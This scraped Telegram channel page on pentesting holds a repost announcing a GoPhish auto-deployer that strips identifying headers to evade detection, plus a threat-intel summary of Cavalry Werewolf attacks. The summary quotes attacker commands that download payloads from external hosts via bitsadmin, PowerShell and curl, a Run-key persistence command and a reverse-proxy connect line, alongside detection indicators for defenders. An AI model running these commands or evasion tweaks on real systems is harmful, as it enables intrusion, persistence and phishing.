es
Feedback
Fsecurity | HH

Fsecurity | HH

Ir al canal en Telegram

👾 Канал про КБ и пентест Наш Discord: https://discord.gg/Eg8aDS7Hn7 ✉️ По сотрудничеству: @OxHaskar 🍩 Поддержать: https://www.donationalerts.com/r/xackapb

Mostrar más
2 074
Suscriptores
+224 horas
+27 días
+930 días
Archivo de publicaciones
Repost from s0ld13r ch.
gophish-auto v0.1 📥 Порой разворачивание серваков и прочие рутинные задачи сильно тормозят работу, решил написать небольшой
gophish-auto v0.1 📥 Порой разворачивание серваков и прочие рутинные задачи сильно тормозят работу, решил написать небольшой Ansible Playbook и One-Shot bash скрипт для автоматического деплоя GoPhish 😃 Features 🤩 • Удаляет/заменяет заметные хэдеры (X-GoPhish-Contact → X-Contact-Address, X-GoPhish-Signature → X-Sender-Signature) • Меняет дефолтный server name и rid, чтобы снизить «отпечаток» сервера • Клонирует репо, билдит на хосте и поднимает systemd-сервис • Поддерживает массовую установку через Ansible inventory - закинул креды в hosts и запустил Usage 👀
ansible-playbook -i ansible/example.hosts ansible/deploy-gophish.yml
Планы на следующие релизы 🔍 • Автоматическая прокидка порта / secure proxy до admin UI (safe internet access) • Генерация config.json из шаблонов, TLS (Certbot) и небольшие улучшения в скрипте 💻 Repo: https://github.com/s0ld13rr/gophish-auto P.S Use only for authorized red team & security awareness assessments 🧢 s0ld13r

Repost from Blue (h/c)at Café
#meme
#meme

🔗Ссылка: https://opennet.ru/64218/

Недавно у моего любимого инструмента bloodyAD появился новый модуль msldap. https://github.com/CravateRouge/bloodyAD/wiki/User-Guide#msldap-commands Кто юзает, обновляйтесь. А если не слышали о bloodyAD, советую попробовать) #ad #pentest #redteam

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/64208/

Cavalry Werewolf: целевая атака на госсектор РФ ⚙️ Формат атаки 🎯 Фишинг → архив с паролем («Служебная записка», «План работ
+7
Cavalry Werewolf: целевая атака на госсектор РФ ⚙️ Формат атаки 🎯 Фишинг → архив с паролем («Служебная записка», «План работы почтового сервера») → исполняемый файл с бэкдором BackDoor.ShellNET.1 (на основе Reverse-Shell-CS). После запуска – обратное соединение с C2 и ручное выполнение команд через cmd.exe. Через него операторы докачивают новые модули через LOLBAS: bitsadmin /transfer www /download hxxp://ip/winpot.exe C:\Users\Public\Downloads\winpot.exe Первым ставится Trojan.FileSpyNET.5 – стилер документов, картинок и txt-файлов → IP/fileupper/getupper.php. Затем – BackDoor.Tunnel.41 (ReverseSocks5) для создания SOCKS5-туннеля и незаметного удалённого доступа. 🧠 Цели и действия атакующего Атакующие проводят ручную разведку через cmd.exe: whoami ipconfig /all net user dir C:\Users\<user>\Downloads dir C:\Users\Public\Pictures Проверяют сетевые прокси: [System.Net.WebRequest]::DefaultWebProxy.GetProxy("https://google.com") Загружают новые модули через PowerShell и curl: powershell -Command Invoke-WebRequest -Uri "hxxps://sss.qwadx.com/revv3.exe" -OutFile "C:\Users\Public\Pictures\rev.exe" curl -o C:\Users\Public\Pictures\rev.exe hxxp://IP/code.exe Закрепление через Run-ключ: REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Service /t REG_SZ /d C:\Users\Public\Pictures\win.exe /f Удаление следов: powershell -Command Remove-Item C:\Users\Public\Pictures\732.exe. 🧩 Инструменты Cavalry Werewolf BackDoor.ShellNET.1 / .2 — C#-бэкдоры (Reverse-Shell-CS, Telegram-бот). BackDoor.ReverseProxy.1 — ReverseSocks5 (Golang), revv2.exe -connect IP:10443. Trojan.Inject5.57968 — инжект в aspnet_compiler.exe, шифрование RC2 / AES, C2. Trojan.Packed2.49708 / Siggen31.54011 — лоадеры Spy-бэкдоров с XOR-дешифровкой. Trojan.Packed2.49862 — троянизированные программы (WinRAR, 7-Zip, VS Code, AkelPad, SumatraPDF) → доставляют AdaptixC2, Havoc, CobaltStrike, Meterpreter, AsyncRAT. Trojan.Clipper.808 — крадет криптокошельки, копирует себя в %APPDATA%\systemservices\svc_host.exe, добавляет Run-ключ SystemServicesHost, сообщает в Telegram-бот о заменённых адресах. ⛓️‍💥Типовая цепочка действий 1️⃣ Фишинг → BackDoor.ShellNET (обратный шелл). 2️⃣ Разведка: whoami / ipconfig / net user. 3️⃣ Загрузка новых модулей через bitsadmin, PowerShell или curl. 4️⃣ Закрепление через Run-ключ или планировщик. 5️⃣ Инжект в .NET-процесс, маскировка под легитимный aspnet_compiler.exe. 6️⃣ Создание туннелей и Telegram-C2. 7️⃣ Эксфильтрация документов, удаление следов. 🧠 Тактические наблюдения Массовое использование open-source (Reverse-Shell-CS, ReverseSocks5, AdaptixC2, Havoc). Telegram-C2 как универсальный контроль вместо доменов. Мимикрия под госдокументы и троянизированные программы. Активная LOLBAS-цепочка: bitsadminpowershellcmd.exe. Хранение и запуск из C:\Users\Public\Pictures|Libraries|Downloads. Переход от разведки к туннелям и долговременному C2 в одном цикле. 🔍 Что отслеживать • Исполнение EXE из Public-директорий. • Bitsadmin с /transfer и URL-адресами. • PowerShell Invoke-WebRequest → Public-папки. • Инжект в aspnet_compiler.exe. • Run-ключи с путём на C:\Users\Public\. • Трафик к api.telegram.org или подозрительным IP 🔗https://news.drweb.ru/show/?i=15078 🦔 THF

Discord сервер 👆🏻Тут можно пообщаться и найти много полезной информации 🦈

🔗Ссылка: https://opennet.ru/64197/